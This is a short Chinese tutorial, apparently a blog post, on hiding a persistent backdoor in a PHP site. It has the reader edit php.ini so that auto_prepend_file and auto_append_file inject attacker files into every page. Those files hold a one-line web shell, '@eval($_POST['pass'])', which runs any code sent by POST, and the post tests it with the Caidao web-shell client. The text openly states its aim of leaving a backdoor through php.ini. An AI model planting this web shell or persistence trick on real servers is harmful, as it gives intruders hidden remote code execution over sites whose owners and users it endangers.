利用php中的一个自动在文件中增加页眉和页脚的功能，隐藏一句话。

在站点的某一目录（如：根目录）下编辑文件php脚本文件，名称为：info.php，内容如下
<?php
Phpinfo();
?>
在本地打开如：http://127.0.0.1/info.php
检查系统使用的配置文件

找到并编辑该配置文件
如下行：
auto_prepend_file =test.php  #自动将“test.php”中的内容增加到任意文件的页眉位置
auto_append_file =fuck.php  #自动将“test.php”中的内容增加到任意文件的页脚位置
如果是unix则修改如下两行
; UNIX: "/path1:/path2"
;include_path = ".:/php/includes"
我使用的是windows
; Windows: "\path1;\path2"
include_path = "E:\PHPnow-1.5.6\htdocs;."#指定php 中的包含函数首先搜索的路径为“E:\PHPnow-1.5.6\htdocs”然后才是“.”即根。
在“E:\PHPnow-1.5.6\htdocs”创建名称（名称随意，上下保持一致即可）为“test.php”和“fuck.php”的脚本文件，其中包含最关键的一句话内容如下：
<?php
@eval($_POST['pass']);      #pass 是密码
?>
使用caidao进行测试，如下：

这样就可以完成使用“php.ini”达到留后门的目的